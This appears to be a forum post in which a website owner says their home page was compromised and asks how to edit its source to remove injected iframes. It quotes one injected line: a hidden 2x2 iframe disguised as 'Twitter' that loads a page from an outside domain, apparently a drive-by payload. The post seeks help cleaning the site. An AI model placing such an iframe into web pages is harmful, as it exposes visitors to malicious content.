Thanks for these links, I have got to a point now where I may have to start again from scratch with the website. Before I do this I would like to know how to edit the source code for my home page. This way I can manually remove the IFrames.
Do you know how to do this?

I have viewed the source code of my home page in internet explorer by going to View > Source and I can clearly see the exploit in the code:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://3disex.net/zxap.html?i=2609068></iframe></body>
How can I edit this code?
